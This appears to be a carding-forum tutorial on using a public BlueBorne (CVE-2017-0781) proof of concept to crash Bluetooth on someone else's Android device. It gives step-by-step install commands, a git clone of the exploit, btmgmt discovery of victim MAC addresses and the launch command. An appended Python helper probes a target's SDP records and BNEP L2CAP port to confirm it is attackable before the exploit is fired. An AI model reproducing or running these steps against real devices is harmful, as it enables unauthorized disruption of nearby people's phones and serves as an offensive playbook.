How to turn off Bluetooth on someone else's device

CarderPlanet

Good day. Today I would like to tell you about a vulnerability that has been known for a long time... People just forgot about it for a while, because the exploit was not spread... And a miracle happened the other day! A Python script that uses the vulnerability (CVE-2017-0781 / BlueBorne) was posted on GitHub.

The essence of the exploit is to force Bluetooth to be disabled on the "victim" device. Roughly speaking, the exploit hits the vulnerabilities of the Android firmware (as some people write, iOS also works every other time) and causes a null-byte error (buffer overflow).

UPD: Personally tested on my own phone, a MEIZU M5 NOTE with the updated Flyme OS.

Let's get started!

> The first thing we need to do is install the script's dependencies.
Code:
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential

Then we update the Python modules.
Code:
pip install --upgrade pip
pip install --upgrade pwntools

To work with Bluetooth from Python, we need the pybluez module.
Code:
apt-get install bluetooth libbluetooth-dev
pip install pybluez

> Then we download the exploit (it would be more correct to call it a script).
Code:
git clone https://github.com/ojasookert/CVE-2017-0781

> Then we have to sweat... because the problem might be as follows:
Bluetooth does not work.... For this we use the btmgmt utility.

We launch it and take the following steps:
Code:
btmgmt --index 0      # open the interactive btmgmt shell on adapter hci0
power on              # "power" takes on/off; bare "power" only prints usage
auto-power            # power up every available adapter
find                  # start discovery; devices appear as "dev_found: <MAC>"

If monitoring of Bluetooth devices starts, then everything is ready.

> We use the script. To do this, we need the MAC address of the Bluetooth device (use btmgmt --index 0 and the find command).

As soon as we have found the "victim", we enter the command:
Code:
# TARGET=<MAC> is read by pwntools' "args" (KEY=value, no spaces, key in capitals);
# put the victim's address from "find" after the "=" in AA:BB:CC:DD:EE:FF form
python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX

And we wait. You can watch the device from other devices or through the console.
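Added example, not part of the original post or of the ojasookert repository: a pre-flight helper for the run described above. It turns whatever address you copied out of `btmgmt find` into the upper-case colon form the PoC wants, and it checks before you fire the PoC that the target actually exposes what the PoC talks to. CVE-2017-0781 lives in BNEP (Bluetooth Network Encapsulation Protocol), which listens on L2CAP PSM 0x000F and is advertised over SDP by the PAN profile service classes (PANU 0x1115, NAP 0x1116, GN 0x1117). The function names are mine; the SDP record shape assumed is the one pybluez's `bluetooth.find_service()` returns, and the sample records in the block are constructed. Only `probe_target()` and `bnep_reachable()` touch the radio and need pybluez plus a powered adapter; the pure helpers run anywhere, on Python 2.7 or 3.

```python
"""Pre-flight check for a CVE-2017-0781 (BlueBorne BNEP) PoC run.

Added example; not code from the post or the ojasookert repository.
"""
import re
import sys

# L2CAP PSM assigned to BNEP (Bluetooth assigned numbers).
BNEP_PSM = 0x000F

# 16-bit service class UUIDs of the PAN profile; any of them means the
# device runs a BNEP listener that the PoC can talk to.
PAN_SERVICE_CLASSES = {"1115": "PANU", "1116": "NAP", "1117": "GN"}

# Constructed SDP records in the shape bluetooth.find_service() returns,
# used for the offline demo below. One NAP record with a 16-bit UUID, one
# PANU record with the UUID expanded to the 128-bit base form, and one
# unrelated record (0x110A, Audio Source) that must be ignored.
SAMPLE_RECORDS = [
    {"service-classes": ["1116"], "protocol": "L2CAP", "port": 15,
     "name": "Network Access Point"},
    {"service-classes": ["00001115-0000-1000-8000-00805F9B34FB"],
     "protocol": "L2CAP", "port": 15, "name": "PAN User"},
    {"service-classes": ["110A"], "protocol": "L2CAP", "port": 25,
     "name": "Audio Source"},
]


def normalize_bdaddr(addr):
    """Return addr as upper-case AA:BB:CC:DD:EE:FF.

    Accepts colon- or dash-separated and bare 12-hex-digit forms in either
    case; raises ValueError for anything that is not a device address."""
    digits = re.sub(r"[:\-\s]", "", addr).upper()
    if not re.match(r"^[0-9A-F]{12}$", digits):
        raise ValueError("not a Bluetooth device address: %r" % (addr,))
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def pan_services(records):
    """Pick the PAN-profile entries out of a list of SDP records.

    Each record is a dict with 'service-classes' (UUID strings), 'protocol'
    and 'port'. Returns [(role, psm), ...], e.g. [('NAP', 15)]. A 16-bit
    UUID may be reported as four hex digits or expanded to the 36-character
    Bluetooth base UUID; both forms are handled."""
    found = []
    for rec in records:
        for cls in rec.get("service-classes", []):
            cls = str(cls).upper()
            short = cls[4:8] if len(cls) == 36 else cls
            if short in PAN_SERVICE_CLASSES:
                found.append((PAN_SERVICE_CLASSES[short], rec.get("port")))
    return found


def probe_target(bdaddr):
    """Ask the target's SDP server which PAN roles it advertises.

    Needs pybluez and an adapter; imported lazily so the pure helpers
    above work without it."""
    import bluetooth
    target = normalize_bdaddr(bdaddr)
    return target, pan_services(bluetooth.find_service(address=target))


def bnep_reachable(bdaddr):
    """Definitive check: open and immediately close an L2CAP connection to
    the BNEP PSM. A device can run BNEP without advertising PAN over SDP,
    so an empty probe_target() result alone does not mean there is nothing
    listening."""
    import bluetooth
    sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    try:
        sock.connect((normalize_bdaddr(bdaddr), BNEP_PSM))
        return True
    except bluetooth.BluetoothError:
        return False
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) == 2:
        target, roles = probe_target(sys.argv[1])
        print("target %s advertises PAN roles: %s" % (target, roles or "none"))
        print("BNEP PSM 0x%04X reachable: %s" % (BNEP_PSM, bnep_reachable(target)))
    else:
        # Offline run against the constructed records.
        print("constructed records -> %s" % pan_services(SAMPLE_RECORDS))
```

Run it with the MAC from `find` as the only argument; if it reports no PAN role and the PSM as unreachable, the PoC will not get an L2CAP connection and there is no point running it. The normalised address it prints is the one to paste after `TARGET=`.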